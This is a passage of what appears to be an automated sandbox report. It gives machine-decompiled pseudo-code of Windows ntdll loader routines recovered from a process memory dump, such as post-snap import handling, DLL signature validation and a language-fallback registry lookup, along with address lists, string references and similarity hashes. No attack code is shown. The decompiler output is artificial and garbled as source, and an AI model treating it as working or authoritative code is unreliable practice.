                                              								_t159 = E0196A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                              								__eflags = _t159;
                                              								if(_t159 < 0) {
                                              									_t81 =  *0x19d5780; // 0x0
                                              									__eflags = _t81 & 0x00000003;
                                              									if((_t81 & 0x00000003) != 0) {
                                              										_push(_t159);
                                              										E01965510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                              										_t81 =  *0x19d5780; // 0x0
                                              									}
                                              									__eflags = _t81 & 0x00000010;
                                              									if((_t81 & 0x00000010) != 0) {
                                              										asm("int3");
                                              									}
                                              								}
                                              							}
                                              						} else {
                                              							_t159 = E018F849B(0, _t122, _t153, _t159, _t180);
                                              							if(_t159 >= 0) {
                                              								goto L6;
                                              							}
                                              						}
                                              						_t80 = _t159;
                                              						goto L8;
                                              					} else {
                                              						_t125 = 0x13;
                                              						asm("int 0x29");
                                              						_push(0);
                                              						_push(_t159);
                                              						_t161 = _t125;
                                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                                              						_t143 = 0;
                                              						_v40 = _t161;
                                              						_t118 = 0;
                                              						_push(_t153);
                                              						__eflags = _t87;
                                              						if(_t87 != 0) {
                                              							_t118 = _t87 + 0x5d8;
                                              							__eflags = _t118;
                                              							if(_t118 == 0) {
                                              								L46:
                                              								_t118 = 0;
                                              							} else {
                                              								__eflags =  *(_t118 + 0x30);
                                              								if( *(_t118 + 0x30) == 0) {
                                              									goto L46;
                                              								}
                                              							}
                                              						}
                                              						_v32 = 0;
                                              						_v28 = 0;
                                              						_v16 = 0;
                                              						_v20 = 0;
                                              						_v12 = 0;
                                              						__eflags = _t118;
                                              						if(_t118 != 0) {
                                              							__eflags = _t161;
                                              							if(_t161 != 0) {
                                              								__eflags =  *(_t118 + 8);
                                              								if( *(_t118 + 8) == 0) {
                                              									L22:
                                              									_t143 = 1;
                                              									__eflags = 1;
                                              								} else {
                                              									_t19 = _t118 + 0x40; // 0x40
                                              									_t156 = _t19;
                                              									E018F8999(_t19,  &_v16);
                                              									__eflags = _v0;
                                              									if(_v0 != 0) {
                                              										__eflags = _v0 - 1;
                                              										if(_v0 != 1) {
                                              											goto L22;
                                              										} else {
                                              											_t128 =  *(_t161 + 0x64);
                                              											__eflags =  *(_t161 + 0x64);
                                              											if( *(_t161 + 0x64) == 0) {
                                              												goto L22;
                                              											} else {
                                              												E018F8999(_t128,  &_v12);
                                              												_t147 = _v12;
                                              												_t91 = 0;
                                              												__eflags = 0;
                                              												_t129 =  *_t147;
                                              												while(1) {
                                              													__eflags =  *((intOrPtr*)(0x19d5c60 + _t91 * 8)) - _t129;
                                              													if( *((intOrPtr*)(0x19d5c60 + _t91 * 8)) == _t129) {
                                              														break;
                                              													}
                                              													_t91 = _t91 + 1;
                                              													__eflags = _t91 - 5;
                                              													if(_t91 < 5) {
                                              														continue;
                                              													} else {
                                              														_t131 = 0;
                                              														__eflags = 0;
                                              													}
                                              													L37:
                                              													__eflags = _t131;
                                              													if(_t131 != 0) {
                                              														goto L22;
                                              													} else {
                                              														__eflags = _v16 - _t147;
                                              														if(_v16 != _t147) {
                                              															goto L22;
                                              														} else {
                                              															E01902280(_t92, 0x19d86cc);
                                              															_t94 = E019B9DFB( &_v20);
                                              															__eflags = _t94 - 1;
                                              															if(_t94 != 1) {
                                              															}
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															_t95 = E019161A0( &_v32);
                                              															__eflags = _t95;
                                              															if(_t95 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t71 = _t118 + 0x40; // 0x3f
                                              																	_t134 = _t71;
                                              																	goto L55;
                                              																}
                                              															}
                                              															goto L30;
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												_t92 = 0x19d5c64 + _t91 * 8;
                                              												asm("lock xadd [eax], ecx");
                                              												_t131 = (_t129 | 0xffffffff) - 1;
                                              												goto L37;
                                              											}
                                              										}
                                              										goto L56;
                                              									} else {
                                              										_t143 = E018F8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                              										__eflags = _t143;
                                              										if(_t143 != 0) {
                                              											_t157 = _v12;
                                              											_t103 = 0;
                                              											__eflags = 0;
                                              											_t136 =  &(_t157[1]);
                                              											 *(_t161 + 0x64) = _t136;
                                              											_t151 =  *_t157;
                                              											_v20 = _t136;
                                              											while(1) {
                                              												__eflags =  *((intOrPtr*)(0x19d5c60 + _t103 * 8)) - _t151;
                                              												if( *((intOrPtr*)(0x19d5c60 + _t103 * 8)) == _t151) {
                                              													break;
                                              												}
                                              												_t103 = _t103 + 1;
                                              												__eflags = _t103 - 5;
                                              												if(_t103 < 5) {
                                              													continue;
                                              												}
                                              												L21:
                                              												_t105 = E0192F380(_t136, 0x18c1184, 0x10);
                                              												__eflags = _t105;
                                              												if(_t105 != 0) {
                                              													__eflags =  *_t157 -  *_v16;
                                              													if( *_t157 >=  *_v16) {
                                              														goto L22;
                                              													} else {
                                              														asm("cdq");
                                              														_t166 = _t157[5] & 0x0000ffff;
                                              														_t108 = _t157[5] & 0x0000ffff;
                                              														asm("cdq");
                                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                              														if(__eflags > 0) {
                                              															L29:
                                              															E01902280(_t108, 0x19d86cc);
                                              															 *_t118 =  *_t118 + 1;
                                              															_t42 = _t118 + 0x40; // 0x3f
                                              															_t156 = _t42;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															_t110 = E019161A0( &_v32);
                                              															__eflags = _t110;
                                              															if(_t110 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t134 = _v20;
                                              																	L55:
                                              																	E019B9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                              																}
                                              															}
                                              															L30:
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															E018FFFB0(_t118, _t156, 0x19d86cc);
                                              															goto L22;
                                              														} else {
                                              															if(__eflags < 0) {
                                              																goto L22;
                                              															} else {
                                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                              																	goto L22;
                                              																} else {
                                              																	goto L29;
                                              																}
                                              															}
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												goto L22;
                                              											}
                                              											asm("lock inc dword [eax]");
                                              											goto L21;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						return _t143;
                                              					}
                                              				} else {
                                              					_push( &_v8);
                                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                                              					_push(__ecx + 0x40);
                                              					_push(_t121);
                                              					_push(0xffffffff);
                                              					_t80 = E01929A00();
                                              					_t159 = _t80;
                                              					if(_t159 < 0) {
                                              						L8:
                                              						return _t80;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              				L56:
                                              			}
                                              0x018f8799
                                              0x018f879d
                                              0x018f87a1
                                              0x018f87a3
                                              0x018f87a8
                                              0x018f87c3
                                              0x018f87c3
                                              0x018f87c8
                                              0x018f87d1
                                              0x018f87d4
                                              0x018f87d8
                                              0x018f87e5
                                              0x018f87ec
                                              0x01949bfe
                                              0x01949c00
                                              0x01949c02
                                              0x01949c08
                                              0x01949c0d
                                              0x01949c0f
                                              0x01949c14
                                              0x01949c2d
                                              0x01949c32
                                              0x01949c37
                                              0x01949c3a
                                              0x01949c3c
                                              0x01949c42
                                              0x01949c42
                                              0x01949c3c
                                              0x01949c02
                                              0x018f87da
                                              0x018f87df
                                              0x018f87e3
                                              0x00000000
                                              0x00000000
                                              0x018f87e3
                                              0x018f87f2
                                              0x00000000
                                              0x018f87fb
                                              0x018f87fd
                                              0x018f87fe
                                              0x018f880e
                                              0x018f880f
                                              0x018f8810
                                              0x018f8814
                                              0x018f881a
                                              0x018f881c
                                              0x018f881f
                                              0x018f8821
                                              0x018f8822
                                              0x018f8824
                                              0x018f8826
                                              0x018f882c
                                              0x018f882e
                                              0x01949c48
                                              0x01949c48
                                              0x018f8834
                                              0x018f8834
                                              0x018f8837
                                              0x00000000
                                              0x00000000
                                              0x018f8837
                                              0x018f882e
                                              0x018f883d
                                              0x018f8840
                                              0x018f8843
                                              0x018f8846
                                              0x018f8849
                                              0x018f884c
                                              0x018f884e
                                              0x018f8850
                                              0x018f8852
                                              0x018f8854
                                              0x018f8857
                                              0x018f88b4
                                              0x018f88b6
                                              0x018f88b6
                                              0x018f8859
                                              0x018f8859
                                              0x018f8859
                                              0x018f8861
                                              0x018f8866
                                              0x018f886a
                                              0x018f893d
                                              0x018f8941
                                              0x00000000
                                              0x018f8947
                                              0x018f8947
                                              0x018f894a
                                              0x018f894c
                                              0x00000000
                                              0x018f8952
                                              0x018f8955
                                              0x018f895a
                                              0x018f895d
                                              0x018f895d
                                              0x018f895f
                                              0x018f8961
                                              0x018f8961
                                              0x018f8968
                                              0x00000000
                                              0x00000000
                                              0x018f896a
                                              0x018f896b
                                              0x018f896e
                                              0x00000000
                                              0x018f8970
                                              0x018f8970
                                              0x018f8970
                                              0x018f8970
                                              0x018f8972
                                              0x018f8972
                                              0x018f8974
                                              0x00000000
                                              0x018f897a
                                              0x018f897a
                                              0x018f897d
                                              0x00000000
                                              0x018f8983
                                              0x01949c65
                                              0x01949c6d
                                              0x01949c72
                                              0x01949c75
                                              0x01949c75
                                              0x01949c82
                                              0x01949c86
                                              0x01949c87
                                              0x01949c88
                                              0x01949c89
                                              0x01949c8c
                                              0x01949c90
                                              0x01949c95
                                              0x01949c97
                                              0x01949ca0
                                              0x01949ca3
                                              0x01949ca9
                                              0x01949ca9
                                              0x00000000
                                              0x01949ca9
                                              0x01949ca3
                                              0x00000000
                                              0x01949c97
                                              0x018f897d
                                              0x00000000
                                              0x018f8974
                                              0x018f8988
                                              0x018f8992
                                              0x018f8996
                                              0x00000000
                                              0x018f8996
                                              0x018f894c
                                              0x00000000
                                              0x018f8870
                                              0x018f887b
                                              0x018f887d
                                              0x018f887f
                                              0x018f8881
                                              0x018f8884
                                              0x018f8884
                                              0x018f8886
                                              0x018f8889
                                              0x018f888c
                                              0x018f888e
                                              0x018f8891
                                              0x018f8891
                                              0x018f8898
                                              0x00000000
                                              0x00000000
                                              0x018f889a
                                              0x018f889b
                                              0x018f889e
                                              0x00000000
                                              0x00000000
                                              0x018f88a0
                                              0x018f88a8
                                              0x018f88b0
                                              0x018f88b2
                                              0x018f88d3
                                              0x018f88d5
                                              0x00000000
                                              0x018f88d7
                                              0x018f88db
                                              0x018f88dc
                                              0x018f88e0
                                              0x018f88e8
                                              0x018f88ee
                                              0x018f88f0
                                              0x018f88f3
                                              0x018f88fc
                                              0x018f8901
                                              0x018f8906
                                              0x018f890c
                                              0x018f890c
                                              0x018f890f
                                              0x018f8916
                                              0x018f8917
                                              0x018f8918
                                              0x018f8919
                                              0x018f891a
                                              0x018f891f
                                              0x018f8921
                                              0x01949c52
                                              0x01949c55
                                              0x01949c5b
                                              0x01949cac
                                              0x01949cc0
                                              0x01949cc0
                                              0x01949c55
                                              0x018f8927
                                              0x018f8927
                                              0x018f892f
                                              0x018f8933
                                              0x00000000
                                              0x018f88f5
                                              0x018f88f5
                                              0x00000000
                                              0x018f88f7
                                              0x018f88f7
                                              0x018f88fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x018f88fa
                                              0x018f88f5
                                              0x018f88f3
                                              0x00000000
                                              0x018f88d5
                                              0x00000000
                                              0x018f88b2
                                              0x018f88c9
                                              0x00000000
                                              0x018f88c9
                                              0x018f887f
                                              0x018f886a
                                              0x018f8857
                                              0x018f8852
                                              0x018f88bf
                                              0x018f88bf
                                              0x018f87aa
                                              0x018f87ad
                                              0x018f87ae
                                              0x018f87b4
                                              0x018f87b5
                                              0x018f87b6
                                              0x018f87b8
                                              0x018f87bd
                                              0x018f87c1
                                              0x018f87f4
                                              0x018f87fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x018f87c1
                                              0x00000000

                                              Strings
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01949C28
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01949C18
                                              • LdrpDoPostSnapWork, xrefs: 01949C1E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 2994545307-1948996284
                                              • Opcode ID: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                              • Instruction ID: 115f4ae17fec64627a0ae599477dc7b75d8facf355fe9691fc73f4aa024b213d
                                              • Opcode Fuzzy Hash: 0bd3615cf86db8f1425639e2e47f5ec60d5743dc7ad5504886da79c84d9fb702
                                              • Instruction Fuzzy Hash: FD910231A1021A9FEB28DF59D480ABABBB5FF86315F15416DDB09EB241D730EA41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E018F7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				signed int _t73;
                                              				void* _t77;
                                              				char* _t82;
                                              				char* _t87;
                                              				signed char* _t97;
                                              				signed char _t102;
                                              				intOrPtr _t107;
                                              				signed char* _t108;
                                              				intOrPtr _t112;
                                              				intOrPtr _t124;
                                              				intOrPtr _t125;
                                              				intOrPtr _t126;
                                              
                                              				_t107 = __edx;
                                              				_v12 = __ecx;
                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                              				_t124 = 0;
                                              				_v20 = __edx;
                                              				if(E018FCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                              					_t112 = _v8;
                                              				} else {
                                              					_t112 = 0;
                                              					_v8 = 0;
                                              				}
                                              				if(_t112 != 0) {
                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                              						_t124 = 0xc000007b;
                                              						goto L8;
                                              					}
                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                              					 *(_t125 + 0x34) = _t73;
                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                              						goto L3;
                                              					}
                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                              					_t124 = E018EC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                              					if(_t124 < 0) {
                                              						goto L8;
                                              					} else {
                                              						goto L3;
                                              					}
                                              				} else {
                                              					L3:
                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                              						L8:
                                              						return _t124;
                                              					}
                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                              							goto L5;
                                              						}
                                              						_t102 =  *0x19d5780; // 0x0
                                              						if((_t102 & 0x00000003) != 0) {
                                              							E01965510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                              							_t102 =  *0x19d5780; // 0x0
                                              						}
                                              						if((_t102 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              						_t124 = 0xc0000428;
                                              						goto L8;
                                              					}
                                              					L5:
                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                              						goto L8;
                                              					}
                                              					_t77 = _a4 - 0x40000003;
                                              					if(_t77 == 0 || _t77 == 0x33) {
                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                              						if(E01907D50() != 0) {
                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              						} else {
                                              							_t82 = 0x7ffe0384;
                                              						}
                                              						_t108 = 0x7ffe0385;
                                              						if( *_t82 != 0) {
                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E01907D50() == 0) {
                                              									_t97 = 0x7ffe0385;
                                              								} else {
                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t97 & 0x00000020) != 0) {
                                              									E01967016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              						}
                                              						if(_a4 != 0x40000003) {
                                              							L14:
                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                              							if(E01907D50() != 0) {
                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              							} else {
                                              								_t87 = 0x7ffe0384;
                                              							}
                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E01907D50() != 0) {
                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t108 & 0x00000020) != 0) {
                                              									E01967016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              							goto L8;
                                              						} else {
                                              							_v16 = _t125 + 0x24;
                                              							_t124 = E0191A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                              							if(_t124 < 0) {
                                              								E018EB1E1(_t124, 0x1490, 0, _v16);
                                              								goto L8;
                                              							}
                                              							goto L14;
                                              						}
                                              					} else {
                                              						goto L8;
                                              					}
                                              				}
                                              			}
                                              Instruction addresses (one per decompiled line above, collapsed here): the code of this function lies in two non-contiguous ranges, 0x018f7e4c to 0x018f7f5a and 0x01949848 to 0x01949993.

                                              Strings
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01949891
                                              • LdrpCompleteMapModule, xrefs: 01949898
                                              • minkernel\ntdll\ldrmap.c, xrefs: 019498A2
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                              • Instruction ID: 62ed30e306e25240851a4a8c7c2128eb7f1bb9550f7c99df43b9c0df7a3af753
                                              • Opcode Fuzzy Hash: b4bc3b9eefd3272cc45dd150a22ae1997f2b5ce56810f99631e5cf0b78890533
                                              • Instruction Fuzzy Hash: CC51DF316007469BF726CF6CC944F2A7BE4AB45B18F1405AEEA55DB3D2D734EA00C751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E018EE620(void* __ecx, short* __edx, short* _a4) {
                                              				char _v16;
                                              				char _v20;
                                              				intOrPtr _v24;
                                              				char* _v28;
                                              				char _v32;
                                              				char _v36;
                                              				char _v44;
                                              				signed int _v48;
                                              				intOrPtr _v52;
                                              				void* _v56;
                                              				void* _v60;
                                              				char _v64;
                                              				void* _v68;
                                              				void* _v76;
                                              				void* _v84;
                                              				signed int _t59;
                                              				signed int _t74;
                                              				signed short* _t75;
                                              				signed int _t76;
                                              				signed short* _t78;
                                              				signed int _t83;
                                              				short* _t93;
                                              				signed short* _t94;
                                              				short* _t96;
                                              				void* _t97;
                                              				signed int _t99;
                                              				void* _t101;
                                              				void* _t102;
                                              
                                              				_t80 = __ecx;
                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                              				_t96 = __edx;
                                              				_v44 = __edx;
                                              				_t78 = 0;
                                              				_v56 = 0;
                                              				if(__ecx == 0 || __edx == 0) {
                                              					L28:
                                              					_t97 = 0xc000000d;
                                              				} else {
                                              					_t93 = _a4;
                                              					if(_t93 == 0) {
                                              						goto L28;
                                              					}
                                              					_t78 = E018EF358(__ecx, 0xac);
                                              					if(_t78 == 0) {
                                              						_t97 = 0xc0000017;
                                              						L6:
                                              						if(_v56 != 0) {
                                              							_push(_v56);
                                              							E019295D0();
                                              						}
                                              						if(_t78 != 0) {
                                              							L019077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                              						}
                                              						return _t97;
                                              					}
                                              					E0192FA60(_t78, 0, 0x158);
                                              					_v48 = _v48 & 0x00000000;
                                              					_t102 = _t101 + 0xc;
                                              					 *_t96 = 0;
                                              					 *_t93 = 0;
                                              					E0192BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                              					_v36 = 0x18;
                                              					_v28 =  &_v44;
                                              					_v64 = 0;
                                              					_push( &_v36);
                                              					_push(0x20019);
                                              					_v32 = 0;
                                              					_push( &_v64);
                                              					_v24 = 0x40;
                                              					_v20 = 0;
                                              					_v16 = 0;
                                              					_t97 = E01929600();
                                              					if(_t97 < 0) {
                                              						goto L6;
                                              					}
                                              					E0192BB40(0,  &_v36, L"InstallLanguageFallback");
                                              					_push(0);
                                              					_v48 = 4;
                                              					_t97 = L018EF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                              					if(_t97 >= 0) {
                                              						if(_v52 != 1) {
                                              							L17:
                                              							_t97 = 0xc0000001;
                                              							goto L6;
                                              						}
                                              						_t59 =  *_t78 & 0x0000ffff;
                                              						_t94 = _t78;
                                              						_t83 = _t59;
                                              						if(_t59 == 0) {
                                              							L19:
                                              							if(_t83 == 0) {
                                              								L23:
                                              								E0192BB40(_t83, _t102 + 0x24, _t78);
                                              								if(L018F43C0( &_v48,  &_v64) == 0) {
                                              									goto L17;
                                              								}
                                              								_t84 = _v48;
                                              								 *_v48 = _v56;
                                              								if( *_t94 != 0) {
                                              									E0192BB40(_t84, _t102 + 0x24, _t94);
                                              									if(L018F43C0( &_v48,  &_v64) != 0) {
                                              										 *_a4 = _v56;
                                              									} else {
                                              										_t97 = 0xc0000001;
                                              										 *_v48 = 0;
                                              									}
                                              								}
                                              								goto L6;
                                              							}
                                              							_t83 = _t83 & 0x0000ffff;
                                              							while(_t83 == 0x20) {
                                              								_t94 =  &(_t94[1]);
                                              								_t74 =  *_t94 & 0x0000ffff;
                                              								_t83 = _t74;
                                              								if(_t74 != 0) {
                                              									continue;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L23;
                                              						} else {
                                              							goto L14;
                                              						}
                                              						while(1) {
                                              							L14:
                                              							_t27 =  &(_t94[1]); // 0x2
                                              							_t75 = _t27;
                                              							if(_t83 == 0x2c) {
                                              								break;
                                              							}
                                              							_t94 = _t75;
                                              							_t76 =  *_t94 & 0x0000ffff;
                                              							_t83 = _t76;
                                              							if(_t76 != 0) {
                                              								continue;
                                              							}
                                              							goto L23;
                                              						}
                                              						 *_t94 = 0;
                                              						_t94 = _t75;
                                              						_t83 =  *_t75 & 0x0000ffff;
                                              						goto L19;
                                              					}
                                              				}
                                              			}
                                              Instruction addresses (one per decompiled line above, collapsed here): the code of E018EE620 lies in two non-contiguous ranges, 0x018ee620 to 0x018ee743 and 0x0194542a to 0x01945503.

                                              Strings
                                              • @, xrefs: 018EE6C0
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 018EE68C
                                              • InstallLanguageFallback, xrefs: 018EE6DB
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                              • Instruction ID: b748a74847807429204f3c7dc319eb4c78cb88705ab14ba33dc0f303df7a31be
                                              • Opcode Fuzzy Hash: 2d33d0de909ab38f79edd7c7b8fd939adf9d63cb306f4e4bcd0a3286617be18b
                                              • Instruction Fuzzy Hash: DD51D3766043169BE714DF68C844E6BB7E8BF89B15F05092EFA89D7240F734DA04C7A2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 60%
                                              			E019AE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v40;
                                              				char _v44;
                                              				intOrPtr _v48;
                                              				signed int _v52;
                                              				unsigned int _v56;
                                              				char _v60;
                                              				signed int _v64;
                                              				char _v68;
                                              				signed int _v72;
                                              				void* __ebx;
                                              				void* __edi;
                                              				char _t87;
                                              				signed int _t90;
                                              				signed int _t94;
                                              				signed int _t100;
                                              				intOrPtr* _t113;
                                              				signed int _t122;
                                              				void* _t132;
                                              				void* _t135;
                                              				signed int _t139;
                                              				signed int* _t141;
                                              				signed int _t146;
                                              				signed int _t147;
                                              				void* _t153;
                                              				signed int _t155;
                                              				signed int _t159;
                                              				char _t166;
                                              				void* _t172;
                                              				void* _t176;
                                              				signed int _t177;
                                              				intOrPtr* _t179;
                                              
                                              				_t179 = __ecx;
                                              				_v48 = __edx;
                                              				_v68 = 0;
                                              				_v72 = 0;
                                              				_push(__ecx[1]);
                                              				_push( *__ecx);
                                              				_push(0);
                                              				_t153 = 0x14;
                                              				_t135 = _t153;
                                              				_t132 = E019ABBBB(_t135, _t153);
                                              				if(_t132 == 0) {
                                              					_t166 = _v68;
                                              					goto L43;
                                              				} else {
                                              					_t155 = 0;
                                              					_v52 = 0;
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					_v56 = __ecx[1];
                                              					if( *__ecx >> 8 < 2) {
                                              						_t155 = 1;
                                              						_v52 = 1;
                                              					}
                                              					_t139 = _a4;
                                              					_t87 = (_t155 << 0xc) + _t139;
                                              					_v60 = _t87;
                                              					if(_t87 < _t139) {
                                              						L11:
                                              						_t166 = _v68;
                                              						L12:
                                              						if(_t132 != 0) {
                                              							E019ABCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                              						}
                                              						L43:
                                              						if(_v72 != 0) {
                                              							_push( *((intOrPtr*)(_t179 + 4)));
                                              							_push( *_t179);
                                              							_push(0x8000);
                                              							E019AAFDE( &_v72,  &_v60);
                                              						}
                                              						L46:
                                              						return _t166;
                                              					}
                                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                              					asm("sbb edi, edi");
                                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                              					if(_t90 != 0) {
                                              						_push(0);
                                              						_push(0x14);
                                              						_push( &_v44);
                                              						_push(3);
                                              						_push(_t179);
                                              						_push(0xffffffff);
                                              						if(E01929730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                              							_push(_t139);
                                              							E019AA80D(_t179, 1, _v40, 0);
                                              							_t172 = 4;
                                              						}
                                              					}
                                              					_t141 =  &_v72;
                                              					if(E019AA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                              						_v64 = _a4;
                                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                              						asm("sbb edi, edi");
                                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                              						if(_t94 != 0) {
                                              							_push(0);
                                              							_push(0x14);
                                              							_push( &_v24);
                                              							_push(3);
                                              							_push(_t179);
                                              							_push(0xffffffff);
                                              							if(E01929730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                              								_push(_t141);
                                              								E019AA80D(_t179, 1, _v20, 0);
                                              								_t176 = 4;
                                              							}
                                              						}
                                              						if(E019AA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                              							goto L11;
                                              						} else {
                                              							_t177 = _v64;
                                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                              							_t100 = _v52 + _v52;
                                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                              							 *(_t132 + 0x10) = _t146;
                                              							asm("bsf eax, [esp+0x18]");
                                              							_v52 = _t100;
                                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                              							_t47 =  &_a8;
                                              							 *_t47 = _a8 & 0x00000001;
                                              							if( *_t47 == 0) {
                                              								E01902280(_t179 + 0x30, _t179 + 0x30);
                                              							}
                                              							_t147 =  *(_t179 + 0x34);
                                              							_t159 =  *(_t179 + 0x38) & 1;
                                              							_v68 = 0;
